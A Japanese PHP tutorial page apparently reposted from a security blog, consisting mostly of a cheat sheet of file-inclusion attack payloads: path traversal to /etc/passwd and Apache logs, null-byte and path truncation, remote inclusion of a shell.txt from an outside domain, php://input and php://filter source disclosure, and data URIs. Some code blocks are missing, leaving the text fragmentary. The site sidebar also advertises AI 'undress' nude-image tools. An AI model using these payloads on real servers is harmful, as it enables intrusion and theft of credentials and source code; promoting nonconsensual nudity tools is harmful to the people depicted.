コミュニティ
学ぶ
ツールライブラリ
AIツール
レジャー
検索
日本語
ホームページ バックエンド開発 PHPチュートリアル 脆弱性解析を含むPHPファイルについて_PHPチュートリアル

脆弱性解析を含むPHPファイルについて_PHPチュートリアル

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
Jul 13, 2016 pm 05:10 PM
php について 分析する 含む 存在する 書類 記事 時間 抜け穴 単純

この記事では、php ファイルがインクルードされる場合の inlcude の脆弱性を簡単に分析します。これが皆様のお役に立てば幸いです。

基本的なファイルインクルードの脆弱性:

コードは次のとおりです コードをコピー

) * 同じパスの下にファイルが含まれています:
?file=.htaccess
* パストラバーサル:
?file=../../../../../../../../../var/lib/locate.db
(このファイルは、ファイル システムを検索できるため、非常に興味深いものです)
* 挿入された PHP コードを含むファイル:
?file=../../../../../../../../../var/log/apache/error.log
(他の考えられる Apache ディレクトリはここで、他の方法はここで見つけることができます。考えられるすべてのログファイル、ファイルアップロード、セッションファイルなどについて考えてください。)

制限されているローカル ファイルには以下が含まれます:

コードは次のとおりです コードをコピー
?file=../../../../../../../../../etc/passwd%00
(magic_quotes_gpc=off が必要)
* カラムディレクトリ (Null Byte Injection):
?file=../../../../../../../../../var/www/accounts/%00
(BSD のみ、magic_quotes_gpc=off が必要、詳細はこちら)
*パスの切り捨て:
?file=../../../../../../../../../etc/passwd..........
(詳しくはこちらとこちらをご覧ください)
* ドットの切り捨て:
?file=../../../../../../../../../etc/passwd………………
(Windows のみ、詳細はこちら)
基本的なリモート ファイルには次のものが含まれます:

コードは次のとおりですコードをコピー


*リモートコードを含む:

?file=[http|https|ftp]://websec.wordpress.com/shell.txt

(allow_url_fopen=On およびallow_url_include=On が必要)

* PHP ストリームの使用 php://input:

?file=php://input

(POST パラメーターでペイロードを指定し、urlencoding を確認してください。詳細はこちら、allow_url_include=On が必要です)

* PHP ストリームの使用 php://filter:

?file=php://filter/convert.base64-encode/resource=index.php
(base64 では評価されないため、PHP ソースを読み取ることができます。詳細については、こことここを参照してください)
* データ URI の使用:
?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
(allow_url_include=On が必要)
* クロスサイト スクリプティング攻撃 (XSS を使用):

コードは次のとおりですコードをコピー?file=http://127.0.0.1/path/xss.php?xss=phpcode

制限付きリモートファイルインクルードの脆弱性

(ファイアウォールで保護されている場合、またはホワイトリストに登録されたドメインのみが許可されている場合は意味があります)
コードは次のとおりです コードをコピー
* ?file=http://websec.wordpress.com/shell.txt?
* ?file=http://websec.wordpress.com/shell.txt%23
(allow_url_fopen=On およびallow_url_include=On が必要)
静的リモート ファイル インクルードの脆弱性:

コードは次のとおりですコードをコピー

* Man In The Middle 攻撃(マン・イン・ザ・ミドル)
(確かに面倒ですが、よく忘れられます)

ライナーズのウェブログより。

http://www.bkjia.com/PHPjc/629654.htmlwww.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/629654.html技術記事この記事では、php ファイルがインクルードされる場合の inlcude の脆弱性を簡単に分析します。これが皆様のお役に立てば幸いです。 基本的なファイルインクルードの脆弱性: コードは次のとおりです コードをコピーします ?php include...
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。

ホットAIツール

Undresser.AI Undress

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

Undress AI Tool

脱衣画像を無料で

Clothoff.io

Clothoff.io

AI衣類リムーバー

AI Hentai Generator

AI Hentai Generator

AIヘンタイを無料で生成します。

もっと見る

人気の記事

R.E.P.O.説明されたエネルギー結晶と彼らが何をするか(黄色のクリスタル)
3週間前 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.最高のグラフィック設定
3週間前 By 尊渡假赌尊渡假赌尊渡假赌
アサシンのクリードシャドウズ:シーシェルリドルソリューション
2週間前 By DDD
R.E.P.O.誰も聞こえない場合はオーディオを修正する方法
3週間前 By 尊渡假赌尊渡假赌尊渡假赌
WWE 2K25:Myriseのすべてのロックを解除する方法
4週間前 By 尊渡假赌尊渡假赌尊渡假赌
もっと見る

ホットツール

メモ帳++7.3.1

メモ帳++7.3.1

使いやすく無料のコードエディター

SublimeText3 中国語版

SublimeText3 中国語版

中国語版、とても使いやすい

ゼンドスタジオ 13.0.1

ゼンドスタジオ 13.0.1

強力な PHP 統合開発環境

ドリームウィーバー CS6

ドリームウィーバー CS6

ビジュアル Web 開発ツール

SublimeText3 Mac版

SublimeText3 Mac版

神レベルのコード編集ソフト(SublimeText3)

もっと見る

ホットトピック

Gmailメールのログイン入り口はどこですか?
7478
15
CakePHP チュートリアル
1377
52
Steamのアカウント名の形式は何ですか
77
11
Win11 Activation Key Permanent
50
19
NYTの接続はヒントと回答です
19
33
もっと見る
Related knowledge
Ubuntu および Debian 用の PHP 8.4 インストールおよびアップグレード ガイド Ubuntu および Debian 用の PHP 8.4 インストールおよびアップグレード ガイド Dec 24, 2024 pm 04:42 PM

PHP 8.4 では、いくつかの新機能、セキュリティの改善、パフォーマンスの改善が行われ、かなりの量の機能の非推奨と削除が行われています。 このガイドでは、Ubuntu、Debian、またはその派生版に PHP 8.4 をインストールする方法、または PHP 8.4 にアップグレードする方法について説明します。

CakePHP の日付と時刻 CakePHP の日付と時刻 Sep 10, 2024 pm 05:27 PM

Cakephp4 で日付と時刻を操作するには、利用可能な FrozenTime クラスを利用します。

CakePHP について話し合う CakePHP について話し合う Sep 10, 2024 pm 05:28 PM

CakePHP は、PHP 用のオープンソース フレームワークです。これは、アプリケーションの開発、展開、保守をより簡単にすることを目的としています。 CakePHP は、強力かつ理解しやすい MVC のようなアーキテクチャに基づいています。モデル、ビュー、コントローラー

CakePHP ファイルのアップロード CakePHP ファイルのアップロード Sep 10, 2024 pm 05:27 PM

ファイルのアップロードを行うには、フォーム ヘルパーを使用します。ここではファイルアップロードの例を示します。

CakePHP バリデータの作成 CakePHP バリデータの作成 Sep 10, 2024 pm 05:26 PM

Validator は、コントローラーに次の 2 行を追加することで作成できます。

PHP 開発用に Visual Studio Code (VS Code) をセットアップする方法 PHP 開発用に Visual Studio Code (VS Code) をセットアップする方法 Dec 20, 2024 am 11:31 AM

Visual Studio Code (VS Code とも呼ばれる) は、すべての主要なオペレーティング システムで利用できる無料のソース コード エディター (統合開発環境 (IDE)) です。 多くのプログラミング言語の拡張機能の大規模なコレクションを備えた VS Code は、

CakePHP クイックガイド CakePHP クイックガイド Sep 10, 2024 pm 05:27 PM

CakePHP はオープンソースの MVC フレームワークです。これにより、アプリケーションの開発、展開、保守がはるかに簡単になります。 CakePHP には、最も一般的なタスクの過負荷を軽減するためのライブラリが多数あります。

PHPでHTML/XMLを解析および処理するにはどうすればよいですか? PHPでHTML/XMLを解析および処理するにはどうすればよいですか? Feb 07, 2025 am 11:57 AM

このチュートリアルでは、PHPを使用してXMLドキュメントを効率的に処理する方法を示しています。 XML(拡張可能なマークアップ言語)は、人間の読みやすさとマシン解析の両方に合わせて設計された多用途のテキストベースのマークアップ言語です。一般的にデータストレージに使用されます

See all articles